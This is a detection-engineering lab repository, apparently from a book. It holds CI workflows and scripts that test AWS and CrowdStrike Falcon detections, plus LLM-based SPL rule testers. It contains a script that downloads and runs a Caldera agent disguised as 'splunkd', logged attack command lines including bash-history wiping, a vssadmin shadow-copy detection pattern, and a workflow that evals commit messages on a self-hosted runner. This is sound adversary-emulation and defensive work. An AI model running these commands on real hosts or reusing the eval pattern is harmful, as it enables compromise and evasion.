61 | # Note: It is recommended to set up a required "strict" status check in your repository for "Terraform Cloud". See the documentation on "strict" required status checks for more information: https://help.github.com/en/github/administering-a-repository/types-of-required-status-checks
62 | - name: Terraform Apply
63 | #if: github.ref == 'refs/heads/"main"' && github.event_name == 'push'
64 | run: terraform apply -auto-approve -input=false -no-color
65 |
66 | # Execute payload check on live env
67 | - name: Execute Rule Tests
68 | run: python ./tests/test-iam-access-key-generated-rule.py
69 | # Validate results in Cloudwatch Metrics
70 | - name: Validate Rule Tests
71 | run: python ./tests/validate-iam-access-key-generated-rule.py
72 |
73 |
74 |
75 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/tests/test-iam-access-key-generated-rule.py:
--------------------------------------------------------------------------------
1 | import boto3, time
2 |
3 | #api client
4 | iam = boto3.client('iam')
5 |
6 | #variables setttings
7 | iam_username = ''
8 |
9 | try:
10 | #replace with a specific test user
11 | response = iam.create_access_key(UserName=iam_username)
12 | access_key = response['AccessKey']['AccessKeyId']
13 | secret_key = response['AccessKey']['SecretAccessKey']
14 |
15 | print("Access Key:", access_key)
16 | #print("Secret Key:", secret_key)
17 | time.sleep(3) #give API time to catch up
18 |
19 | #restore original state
20 | response = iam.delete_access_key(
21 | UserName=iam_username,
22 | AccessKeyId=access_key #required
23 | )
24 | print('IAM key generated and deleted successfully.')
25 | except ValueError:
26 | print('IAM key was not successfully created and deleted for: ', iam_username)
27 | exit(1)
28 |
29 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/tests/testing.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import boto3
3 |
4 | # Create a CloudWatch client
5 | cloudwatch = boto3.client('cloudwatch')
6 |
7 | # Define the parameters for the metric query
8 | namespace = 'AWS/Events'
9 | metric_name = 'MatchedEvents'
10 | rule_name = 'iam-access-key-generated-rule'
11 |
12 | # Query the metric data
13 | response = cloudwatch.get_metric_data(
14 | MetricDataQueries=[
15 | {
16 | 'Id': 'metric_query',
17 | 'MetricStat': {
18 | 'Metric': {
19 | 'Namespace': namespace,
20 | 'MetricName': metric_name,
21 | 'Dimensions': [
22 | {
23 | 'Name': 'RuleName',
24 | 'Value': rule_name
25 | }
26 | ]
27 | },
28 | 'Period': 300, # 5 minutes
29 | 'Stat': 'Sum', # You can change this to other statistics like 'Average', 'Maximum', etc.
30 | 'Unit': 'Count'
31 | }
32 | }
33 | ],
34 | StartTime='2024-01-17T00:00:00Z',
35 | EndTime='2024-01-17T23:59:59Z'
36 | )
37 |
38 | # Process the response
39 | try:
40 | if 'MetricDataResults' in response:
41 | for result in response['MetricDataResults']:
42 | #print(type(result))
43 | print(f"Result output: ", result['Values'][0])
44 | if result['Values'][0] > 0:
45 | print('Test Pass')
46 | if result['Values'][0] == "":
47 | print('Test Failed, no results')
48 | exit(1)
49 | else:
50 | print('Test failed')
51 | exit(1)
52 | except ValueError:
53 | print("Test Failed")
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/tests/validate-iam-access-key-generated-rule.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from datetime import datetime, timedelta
3 | import boto3, time
4 |
5 | #sleeping up to 3 minutes for event detection catchup
6 | print("Sleeping for 1 minute for AWS CloudWatch Metrics to Catch Up...")
7 | time.sleep(60)
8 |
9 | #api client construct and assumes you have STS token active
10 | cloudwatch = boto3.client('cloudwatch')
11 |
12 | #set variables for your test
13 | namespace = 'AWS/Events'
14 | metric_name = 'MatchedEvents'
15 | rule_name = 'security-iam-access-key-generated'
16 |
17 | #aws requires start/end time in strtime UTC format
18 | end_time = datetime.utcnow()
19 | start_time = end_time - timedelta(minutes=15) #obviously change this to something reasonable ~5-20 min
20 |
21 | start_time = start_time.strftime('%Y-%m-%dT%H:%M:%SZ')
22 | end_time = end_time.strftime('%Y-%m-%dT%H:%M:%SZ')
23 |
24 | print("Checking Start Time:", start_time)
25 | print("Checking End Time:", end_time)
26 |
27 | #use cloudwatch metric query to evaluate results
28 | response = cloudwatch.get_metric_data(
29 | MetricDataQueries=[
30 | {
31 | 'Id': 'metric_query',
32 | 'MetricStat': {
33 | 'Metric': {
34 | 'Namespace': namespace,
35 | 'MetricName': metric_name,
36 | 'Dimensions': [
37 | {
38 | 'Name': 'RuleName',
39 | 'Value': rule_name
40 | }
41 | ]
42 | },
43 | 'Period': 300, #use 5 minute intervals as the metric
44 | 'Stat': 'Sum', #you can change this based on the console
45 | 'Unit': 'Count'
46 | }
47 | }
48 | ],
49 | StartTime=start_time,
50 | EndTime=end_time
51 | )
52 |
53 | #actual test logic
54 | try:
55 | if 'MetricDataResults' in response:
56 | for result in response['MetricDataResults']:
57 | #print(type(result))
58 | print(result)
59 | print(f"Result output: ", result['Values'][0])
60 | if result['Values'][0] > 0:
61 | print('Test Pass')
62 | else:
63 | print('Test failed')
64 | exit(1)
65 | except ValueError:
66 | print("Test Failed")
67 | exit(1)
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/BASE-get-detections-host-cs copy.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os, json
3 | from datetime import datetime, timedelta
4 | from falconpy import APIHarnessV2
5 |
6 | # Get API credentials from environment variables
7 | CS_CLIENT_ID = os.environ.get('CS_CLIENT_ID')
8 | CS_CLIENT_SECRET = os.environ.get('CS_CLIENT_SECRET')
9 |
10 | # Set the time range for the detection alert query
11 | current_time = datetime.now() # NOTE(review): local time, yet formatted with a 'Z' (UTC) suffix below -- confirm timezone intent
12 | last4h = current_time - timedelta(hours=4)
13 |
14 | lookup_time = last4h.strftime("%Y-%m-%dT%H:%M:%SZ")
15 | #print(lookup_time)
16 |
17 | # Do not hardcode API credentials!
18 | falcon = APIHarnessV2(client_id=CS_CLIENT_ID, client_secret=CS_CLIENT_SECRET)
19 |
20 | host_name = "dc-ubuntu"
21 |
22 | filter_query = f"last_behavior:<='{lookup_time}', device.hostname:'{host_name}'" # NOTE(review): '<=' selects behaviors at/before the 4h-ago mark; '>=' would mean "within the last 4 hours" -- confirm
23 | #filter_query = f"device.hostname:'{host_name}'"
24 |
25 | response = falcon.command("QueryDetects",
26 | offset=0,
27 | limit=50,
28 | sort="last_behavior|desc",
29 | filter=filter_query
30 | )
31 |
32 | #print(type(response))
33 | detectid_values_list = response['body']['resources'] # list of detection IDs returned by the query
34 |
35 | BODY = {
36 | "ids": detectid_values_list
37 | }
38 |
39 | response = falcon.command("GetDetectSummaries", body=BODY)
40 | #returned json sometimes has non complianct chars
41 | response = json.dumps(response) #converts to string
42 | response = json.loads(response) #converts back to json compatible dictionary
43 | #print(type(response))
44 |
45 | if response['status_code'] in range(200,299): #in case they add 2XX additional states in future (note: range() excludes 299)
46 | for resource in response['body']['resources']:
47 | for behavior in resource['behaviors']:
48 | cmdline = behavior['cmdline']
49 | tactic_id = behavior['tactic_id']
50 | display_name = behavior['display_name']
51 | severity = behavior['severity'] # integer
52 | confidence = behavior['confidence'] # integer
53 | print('#### Detections Triggered ####')
54 | print(f'Cmdline: {cmdline}')
55 | print(f'Tactic ID: {tactic_id}')
56 | print(f'Display Name: {display_name}')
57 | print(f'Severity: {severity}')
58 | print(f'Confidence: {confidence}')
59 |
60 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/Cloud IP Addresses and FQDNs _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-06/lab-6.3/Cloud IP Addresses and FQDNs _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/Deploy Falcon Sensor for Linux Using CLI _ Deploy Falcon Sensor for Linux _ Falcon Sensor for Linux _ Linux, Kubernetes, and Cloud _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-06/lab-6.3/Deploy Falcon Sensor for Linux Using CLI _ Deploy Falcon Sensor for Linux _ Falcon Sensor for Linux _ Linux, Kubernetes, and Cloud _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/Sensor Update Policies _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-06/lab-6.3/Sensor Update Policies _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/custom-ioa-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from falconpy import APIHarnessV2
3 | import argparse, json
4 |
5 | #Ref: https://www.falconpy.io/Usage/Basic-Uber-Class-usage.html#import-and-authentication
6 |
7 |
8 | def uploadioa(ioc_body):
9 | BODY = ioc_body
10 | response = falcon.command("create_rule",
11 | retrodetects=False,
12 | ignore_warnings=True,
13 | body=BODY
14 | )
15 | #print(response)
16 | return response
17 |
18 | if __name__ == '__main__':
19 | parser = argparse.ArgumentParser(
20 | prog='custom-ioa-cs',
21 | description='Takes JSON formatted payload for a custom IOA',
22 | epilog='Usage: python3 custom-ioa-cs.py -id "" -secret ""'
23 | )
24 | parser.add_argument('-id', type=str, help='Crowdstrike Falcon API CLIENT_ID')
25 | parser.add_argument('-secret', type=str, help='Crowdstrike Falcon API CLIENT_SECRET')
26 | args = parser.parse_args()
27 |
28 | #assign secrets from env variables or arguments from CLI
29 | CLIENT_ID = args.id
30 | CLIENT_SECRET = args.secret
31 |
32 |
33 | #client setup do outside of function so you arent using against call quotas each post
34 | falcon = APIHarnessV2(client_id=CLIENT_ID,
35 | client_secret=CLIENT_SECRET
36 | )
37 |
38 | #construct body read from external file like a real CI
39 | file_handle = open('test-rule-import.json', 'r')
40 | BODY = json.loads(file_handle.read())
41 | #print(type(BODY))
42 | #print(BODY)
43 |
44 | #call function with parameters
45 |
46 | response = uploadioa(BODY)
47 | json_response = json.dumps(response)
48 | print(json_response)
49 |
50 |
51 | exit()
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/detections-example-output-build-ci.txt:
--------------------------------------------------------------------------------
1 | #### Detections Triggered ####
2 | Cmdline: curl -s -X POST -H file:sandcat.go -H platform:linux http://0.0.0.0:8888/file/download
3 | Tactic ID: TA0011
4 | Display Name: CurlWgetMalwareDownload
5 | Severity: 70
6 | Confidence: 80
7 | #### Detections Triggered ####
8 | Cmdline: curl -s -X POST -H file:sandcat.go -H platform:linux http://0.0.0.0:8888/file/download
9 | Tactic ID: TA0011
10 | Display Name: CurlWgetMalwareDownload
11 | Severity: 70
12 | Confidence: 80
13 | #### Detections Triggered ####
14 | Cmdline: curl -s -X POST -H file:sandcat.go -H platform:linux http://0.0.0.0:8888/file/download
15 | Tactic ID: TA0011
16 | Display Name: CurlWgetMalwareDownload
17 | Severity: 70
18 | Confidence: 80
19 | #### Detections Triggered ####
20 | Cmdline: curl -s -X POST -H file:sandcat.go -H platform:linux http://0.0.0.0:8888/file/download
21 | Tactic ID: TA0011
22 | Display Name: CurlWgetMalwareDownload
23 | Severity: 70
24 | Confidence: 80
25 | #### Detections Triggered ####
26 | Cmdline: ./splunkd -server http://0.0.0.0:8888 -group red -v
27 | Tactic ID: TA0005
28 | Display Name: SystemBinaryMasqeradingLin
29 | Severity: 70
30 | Confidence: 80
31 | #### Detections Triggered ####
32 | Cmdline: sh -c > $HOME/.bash_history && unset HISTFILE
33 | Tactic ID: CSTA0001
34 | Display Name: GenPostExploitLinSession
35 | Severity: 70
36 | Confidence: 80
37 | #### Detections Triggered ####
38 | Cmdline: sh -c > $HOME/.bash_history && unset HISTFILE
39 | Tactic ID: TA0002
40 | Display Name: GenDefenseEvasionLinSession
41 | Severity: 70
42 | Confidence: 80
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/falcon-detection-testing.yml:
--------------------------------------------------------------------------------
1 | # This is a basic workflow to help you get started with Actions
2 |
3 | name: Use Case Tests for CS Falcon EDR Detections
4 |
5 | # Controls when the workflow will run
6 | on:
7 |   push:
8 |     branches: [ "main" ]
9 |     paths:
10 |       - usecase-tests/*
11 | #      - ioa-rules/*
12 |   pull_request:
13 |     branches: [ "main" ]
14 |
15 |   # Allows you to run this workflow manually from the Actions tab
16 |   workflow_dispatch:
17 |
18 | #when running commit prior to a push you setup the cli parameters that should trigger a detection
19 | #SECURITY NOTE: test_payload is the raw commit message and is later passed to
20 | #eval, i.e. anyone who can push to this branch runs arbitrary shell on the
21 | #self-hosted runner. That is deliberate for this detection-testing lab, but
22 | #never reuse this pattern on a runner with access to production secrets.
23 | env:
24 |   test_payload: ${{ github.event.head_commit.message }}
25 |   CS_CLIENT_ID: ${{ secrets.CS_CLIENT_ID }}
26 |   CS_CLIENT_SECRET: ${{ secrets.CS_CLIENT_SECRET }}
27 |
28 | permissions:
29 |   contents: read  # This is required for actions/checkout
30 |
31 | jobs:
32 |   DetectionTestTrigger:
33 |     # The type of runner that the job will run on
34 |     runs-on: [self-hosted, linux, dc-ubuntu] #based on logical combination of labels
35 |     steps:
36 |       # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
37 |       - uses: actions/checkout@v4
38 |
39 |       #deploy python and cache requirements
40 |       - name: Setup Python Packages
41 |         uses: actions/setup-python@v5
42 |         with:
43 |           python-version: '3.10'
44 |           cache: 'pip'
45 |       - run: pip install -r ./requirements.txt
46 |
47 |       # Runs a single command using the runners shell
48 |       # Executes the attack payload embedded in the commit message (see env note above)
49 |       - name: Execute Payload from Commit Message
50 |         continue-on-error: true #doesnt guarantee a trigger, just keeps bash from failing the job on a non-0 exit
51 |         run: eval $test_payload
52 |
53 |       # Wait for the detection to land in CS Falcon before querying the API
54 |       - name: Wait for Detections in CS Falcon
55 |         run: sleep 30 #use what makes sense
56 |
57 |       - name: Run Tests
58 |         run: |
59 |           python ./usecase-tests/test-detections-host-cs.py #hard coded to our testing machine, you can refactor later
60 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/get-ioa-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os, json
3 | from falconpy import APIHarnessV2
4 |
5 | # Read Falcon API credentials from the environment (injected by the CI runner).
6 | CLIENT_ID = os.getenv('CS_CLIENT_ID')
7 | CLIENT_SECRET = os.getenv('CS_CLIENT_SECRET')
8 |
9 | # Do not hardcode API credentials!
10 | falcon = APIHarnessV2(client_id=CLIENT_ID,
11 |                       client_secret=CLIENT_SECRET
12 |                       )
13 |
14 | # Rule ids to fetch; "1" looks like a lab placeholder — replace with your
15 | # real custom IOA rule ids before using in CI.
16 | BODY = {
17 |     "ids": ["1"]
18 | }
19 |
20 | # get_rules_get returns the full rule definitions for the supplied ids.
21 | response = falcon.command("get_rules_get", body=BODY)
22 | #print(type(response))
23 | # Dump the response dict as JSON so the CI log captures machine-readable output.
24 | json_response = json.dumps(response)
25 | print(json_response)
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/linter-custom-ioa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import jsonschema, json
3 |
4 | #raw openapi spec
5 | #https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-mav.json
6 |
7 | #2023-dec-28 us-2 falcon
8 | custom_ioa_schema = {
9 | "comment": "string",
10 | "description": "string",
11 | "disposition_id": 0,
12 | "field_values": [
13 | {
14 | "final_value": "string",
15 | "label": "string",
16 | "name": "string",
17 | "type": "string",
18 | "value": "string",
19 | "values": [
20 | {
21 | "label": "string",
22 | "value": "string"
23 | }
24 | ]
25 | }
26 | ],
27 | "name": "string",
28 | "pattern_severity": "string",
29 | "rulegroup_id": "string",
30 | "ruletype_id": "string"
31 | }
32 |
33 | try:
34 | #imported sample use case
35 | file_handle = open('test-rule-import.json', 'r')
36 |
37 | use_case_payload = json.load(file_handle)
38 |
39 | results = jsonschema.validate(instance=use_case_payload,
40 | schema=custom_ioa_schema)
41 | #print(results)
42 | if 'None' in str(results):
43 | print('Custom use case payload VALIDATED')
44 | elif str(results) != 'None':
45 | print('ERROR: Custom IOA payload does not meet schema spec for Dec 2023.' +
46 | 'See: https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-us2.html#/custom-ioa/create-rule')
47 | exit(1)
48 | except:
49 | exit(1)
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/requirements.txt:
--------------------------------------------------------------------------------
1 | attrs==23.2.0
2 | certifi==2023.11.17
3 | charset-normalizer==3.3.2
4 | crowdstrike-falconpy==1.3.5
5 | docutils==0.20.1
6 | idna==3.6
7 | jsonschema==4.20.0
8 | jsonschema-specifications==2023.12.1
9 | referencing==0.32.0
10 | requests==2.31.0
11 | rpds-py==0.16.2
12 | statistics==1.0.3.5
13 | urllib3==2.1.0
14 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/test-detections-host-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os, json, statistics
3 | from datetime import datetime, timedelta
4 | from falconpy import APIHarnessV2
5 |
6 | #secrets must be injected at test time from the CI runner
7 | CS_CLIENT_ID = os.environ.get('CS_CLIENT_ID')
8 | CS_CLIENT_SECRET = os.environ.get('CS_CLIENT_SECRET')
9 |
10 |
11 | def getDetections(tested_host_name, num_hours_lookback):
12 | #type cast the user input
13 | host_name = str(tested_host_name)
14 | num_hours = int(num_hours_lookback)
15 |
16 | #construct the API client
17 | falcon = APIHarnessV2(client_id=CS_CLIENT_ID, client_secret=CS_CLIENT_SECRET)
18 |
19 | #strtime fmt requirement lookback for cs timestamps
20 | current_time = datetime.now()
21 | last_hrs = current_time - timedelta(hours=num_hours)
22 | lookup_time = last_hrs.strftime("%Y-%m-%dT%H:%M:%SZ")
23 | #print(lookup_time)
24 |
25 | filter_query = f"last_behavior:<='{lookup_time}', device.hostname:'{host_name}'"
26 | #filter_query = f"device.hostname:'{host_name}'"
27 |
28 | response = falcon.command("QueryDetects",
29 | offset=0,
30 | limit=50,
31 | sort="last_behavior|desc",
32 | filter=filter_query
33 | )
34 |
35 | #print(type(response))
36 | detectid_values_list = response['body']['resources']
37 |
38 | BODY = {
39 | "ids": detectid_values_list
40 | }
41 |
42 | response = falcon.command("GetDetectSummaries", body=BODY)
43 | #returned json sometimes has non complianct chars need to scrub them
44 | response = json.dumps(response) #converts to string
45 | response = json.loads(response) #converts back to json compatible dictionary
46 | #print(type(response))
47 |
48 | #aggregate multiple detections where applicable
49 | cmdline_list = []
50 | tactic_id_list = []
51 | display_name_list = []
52 | severity_list = []
53 | confidence_list = []
54 |
55 | if response['status_code'] in range(200,299): #in case they add 2XX additional states in future
56 | for resource in response['body']['resources']:
57 | for behavior in resource['behaviors']:
58 | cmdline = behavior['cmdline']
59 | tactic_id = behavior['tactic_id']
60 | display_name = behavior['display_name']
61 | severity = behavior['severity'] # integer
62 | confidence = behavior['confidence'] # integer
63 | #add to respective lists for return later
64 | cmdline_list.append(cmdline)
65 | tactic_id_list.append(tactic_id)
66 | display_name_list.append(display_name)
67 | severity_list.append(severity)
68 | confidence_list.append(confidence)
69 | #return cmdline, tactic_id, display_name, severity, confidence #use for first or single detections
70 | return cmdline_list, tactic_id_list, display_name_list, severity_list, confidence_list #returns position tuples
71 |
72 | #driver main
73 | if __name__ == '__main__':
74 | #for the lab we are running the self hosted runner on the same 'test' host
75 | #in prod you should separate these and execute via ssh keys remotely
76 | ### TEST PARAMETER SPECIFICS ###
77 | host_name = "dc-ubuntu"
78 | results = getDetections(host_name, 4)
79 |
80 | ### TEST CRITERIA ###
81 | #print if you want to debug exceptions in the CI logs easier
82 | print(results)
83 |
84 | #example if your overrall detections are based on ML or fuzzy you can use averages pending EDR
85 | if statistics.mean(results[4]) >=80:
86 | print('EDR confidence score disposition ok')
87 | if 'CurlWgetMalwareDownload' in results[2]:
88 | print('end-to-end test successful')
89 | else:
90 | print('test did not meet requirement spec')
91 | exit(1)
92 |
93 | #setting job on eval to continue on error try other lolbins
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/test-rule-import.json:
--------------------------------------------------------------------------------
1 | {
2 | "comment": "test falconpy custom ioa",
3 | "description": "example custom ioa detection use case",
4 | "disposition_id": 10,
5 | "field_values": [
6 | {
7 | "name": "GrandparentImageFilename",
8 | "value": ".*",
9 | "label": "Grandparent Image Filename",
10 | "type": "excludable",
11 | "values": [
12 | {
13 | "label": "include",
14 | "value": ".*"
15 | }
16 | ],
17 | "final_value": ".*"
18 | },
19 | {
20 | "name": "GrandparentCommandLine",
21 | "value": ".*",
22 | "label": "Grandparent Command Line",
23 | "type": "excludable",
24 | "values": [
25 | {
26 | "label": "include",
27 | "value": ".*"
28 | }
29 | ],
30 | "final_value": ".*"
31 | },
32 | {
33 | "name": "ParentImageFilename",
34 | "value": ".*",
35 | "label": "Parent Image Filename",
36 | "type": "excludable",
37 | "values": [
38 | {
39 | "label": "include",
40 | "value": ".*"
41 | }
42 | ],
43 | "final_value": ".*"
44 | },
45 | {
46 | "name": "ParentCommandLine",
47 | "value": ".*",
48 | "label": "Parent Command Line",
49 | "type": "excludable",
50 | "values": [
51 | {
52 | "label": "include",
53 | "value": ".*"
54 | }
55 | ],
56 | "final_value": ".*"
57 | },
58 | {
59 | "name": "ImageFilename",
60 | "value": ".*",
61 | "label": "Image Filename",
62 | "type": "excludable",
63 | "values": [
64 | {
65 | "label": "include",
66 | "value": ".*"
67 | }
68 | ],
69 | "final_value": ".*"
70 | },
71 | {
72 | "name": "CommandLine",
73 | "value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB",
74 | "label": "Command Line",
75 | "type": "excludable",
76 | "values": [
77 | {
78 | "label": "include",
79 | "value": "(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
80 | }
81 | ],
82 | "final_value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
83 | }
84 | ],
85 | "name": "test-rule-ioa-runner",
86 | "pattern_severity": "informational",
87 | "rulegroup_id": "",
88 | "ruletype_id": "1"
89 | }
--------------------------------------------------------------------------------
/chapter-06/lab-6.4/start-caledera.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/bash
2 | cd /home/dc/Downloads/caldera
3 | python3 server.py --insecure &
4 | sleep 10
5 | #use default sandcat agent
6 | server="http://0.0.0.0:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;chmod +x splunkd;./splunkd -server $server -group red -v &
7 |
--------------------------------------------------------------------------------
/chapter-06/optional-resources/bas-tools/safebreach-get-test-results.py:
--------------------------------------------------------------------------------
1 | import http.client
2 | # "url" is a placeholder — set your SafeBreach console hostname before running.
3 | conn = http.client.HTTPSConnection("url")
4 |
5 | ### Run an existing simulation plan you made in console ###
6 | headers = {
7 |     'accept': "application/json",
8 |     'x-apitoken': "REPLACE_KEY_VALUE"
9 | }
10 |
11 | # %7B / %7D are URL-encoded braces: substitute your real account_id into the path.
12 | conn.request("POST", "/api/orch/v2/accounts/%7Baccount_id%7D/queue", headers=headers)
13 |
14 | res = conn.getresponse()
15 | data = res.read()
16 |
17 | print(data.decode("utf-8"))
18 |
19 | ### add logic here to retry and wait for specific amounts of time until a response returns 2XX ###
20 |
21 | ### Get Test Results Summaries to Parse ###
22 | # Reuses the same connection; the prior response was fully read above, which
23 | # http.client requires before issuing another request on one connection.
24 | # Substitute real account_id and testId values into the path.
25 | conn.request("GET", "/api/data/v1/accounts/%7Baccount_id%7D/testsummaries/%7BtestId%7D", headers=headers)
26 | res = conn.getresponse()
27 | data = res.read()
28 |
29 | print(data.decode("utf-8"))
30 |
31 |
32 | ### add logic here parse the results and ensure the detections fired exit with error or exit clean when part of CI ###
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/ai-unit-testing-prompt-claude2.txt:
--------------------------------------------------------------------------------
1 | - name: Run LLM Engine 1
2 | run: |
3 | python ./llm-engine-1-test-increment-var.py
4 | - name: Run LLM Engine 2
5 | run: |
6 | python ./llm-engine-2-test-increment-var.py
7 | - name: Calculate Min Score Vote
8 | run: |
9 | if [[ $SUM_SCORE -le 5 ]]; then echo "FAIL: Threshold Not Met" && exit 1; fi
10 |
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/bot-kb/links-to-pdfs.md:
--------------------------------------------------------------------------------
1 | ## Download the following PDFs and upload them to your poe.com bot as a knowledge base
2 | - https://www.splunk.com/en_us/form/the-network-defenders-compendium.html
3 | - https://www.splunk.com/pdfs/exploring-splunk.pdf
4 | - https://conf.splunk.com/files/2016/slides/power-of-spl.pdf
5 | - https://conf.splunk.com/files/2017/slides/power-of-spl.pdf
6 | - https://conf.splunk.com/files/2017/slides/the-art-of-detection-using-splunk-enterprise-security.pdf
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/buildspec.csv:
--------------------------------------------------------------------------------
1 | ./logs/aws-iam-access-key-creation.log,./detections/aws-iam-access-key-creation.spl
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/ci-spl-tester-poe.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import asyncio, os, argparse, warnings, csv
3 | import fastapi_poe as fp
4 |
5 | api_key = os.getenv('POE_API')
6 |
7 | #need to use async because bot will have multi-line outputs that need to complete
8 | #https://developer.poe.com/server-bots/accessing-other-bots-on-poe
9 | async def get_responses(api_key, messages):
10 | response = ""
11 | async for partial in fp.get_bot_response(messages=messages,
12 | #bot_name="",
13 | bot_name="Claude-2-100k",
14 | #bot_name="Claude-Instant",
15 | api_key=api_key,
16 | temperature=0.15):
17 | if isinstance(partial, fp.PartialResponse) and partial.text:
18 | response += partial.text
19 |
20 | return response
21 |
22 | #parse buildspec file
23 | buildspec_handle = open('buildspec.csv', 'r')
24 | buildspec_file = csv.reader(buildspec_handle, delimiter=',')
25 | for i in buildspec_file: #csv.reader requires iteration
26 | log_path = str(i[0]) #get first column
27 | spl_path = str(i[1]) #get second column
28 |
29 | #forgot about overloads :)
30 | log_file = open(log_path, 'r').read()
31 | spl_file = open(spl_path, 'r').read()
32 | prompt_file = open('prompt.md', 'r').read()
33 |
34 | #construct the prompt without fstrings
35 | prompt_text = prompt_file + '\n ## Sample Log \n' + log_file + '\n ## Correlation Search SPL \n' + spl_file
36 | #print(prompt_text)
37 |
38 | message = fp.ProtocolMessage(role="user", content=(prompt_text))
39 |
40 | #main driver
41 | if __name__ == "__main__":
42 | #event loop response
43 | bot_response = asyncio.run(get_responses(api_key, [message]))
44 | print(bot_response)
45 | if '[HIGH]' in bot_response:
46 | print('PASS: AI Evaluation - HIGH')
47 | exit()
48 | elif '[MEDIUM]' in bot_response:
49 | print('CAUTION: AI Evaluation - MEDIUM')
50 | warnings.warn('CAUTION: AI Evaluation - MEDIUM')
51 | elif '[LOW]' in bot_response:
52 | print('FAIL: AI Evaluation - LOW')
53 | raise ValueError('TEST FAIL: AI Low probability Rating. Please check test log and SPL.')
54 | exit(1)
55 | elif '[UNKNOWN]' in bot_response:
56 | print('FAIL: AI Evaluation - UNKNOWN')
57 | raise ValueError('TEST FAIL: AI cannot determine detection. Please check test log and SPL.')
58 | exit(1)
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/detections/aws-iam-access-key-creation.spl:
--------------------------------------------------------------------------------
1 | `cloudtrail` eventName = CreateAccessKey userAgent !=console.amazonaws.com errorCode = success
2 | | eval match=if(match(userIdentity.userName,requestParameters.userName),1,0)
3 | | search match=0
4 | | stats count min(_time) as firstTime max(_time) as lastTime by requestParameters.userName src eventName eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.principalId user_arn
5 | | `security_content_ctime(firstTime)`
6 | | `security_content_ctime(lastTime)`
7 | |`aws_createaccesskey_filter`
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/local-spl-tester-poe.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import asyncio, os, argparse, warnings
3 | import fastapi_poe as fp
4 |
5 | api_key = os.getenv('POE_API')
6 |
7 | #runtime arguments
8 | parser = argparse.ArgumentParser()
9 | parser.add_argument('-log', type=str, help='/path/to/testlog.log')
10 | parser.add_argument('-spl', type=str, help='/path/to/detection.spl')
11 | args = parser.parse_args()
12 |
13 | if not args.log:
14 | print('Please add -log ')
15 | exit()
16 | if not args.spl:
17 | print('Please add -spl ')
18 |
19 | #need to use async because bot will have multi-line outputs that need to complete
20 | #https://developer.poe.com/server-bots/accessing-other-bots-on-poe
21 | async def get_responses(api_key, messages):
22 | response = ""
23 | async for partial in fp.get_bot_response(messages=messages,
24 | #bot_name="",
25 | #bot_name="Claude-2-100k",
26 | bot_name="Claude-Instant",
27 | api_key=api_key,
28 | temperature=0.15):
29 | if isinstance(partial, fp.PartialResponse) and partial.text:
30 | response += partial.text
31 |
32 | return response
33 |
34 | #pull details from files and construct message
35 | log_path = args.log
36 | spl_path = args.spl
37 |
38 | #forgot about overloads :)
39 | log_file = open(log_path, 'r').read()
40 | spl_file = open(spl_path, 'r').read()
41 | prompt_file = open('prompt.md', 'r').read()
42 |
43 | #construct the prompt without fstrings
44 | prompt_text = prompt_file + '\n ## Sample Log \n' + log_file + '\n ## Correlation Search SPL \n' + spl_file
45 | #print(prompt_text)
46 |
47 | #good practice
48 | log_file.close()
49 | spl_file.close()
50 | prompt_file.close()
51 |
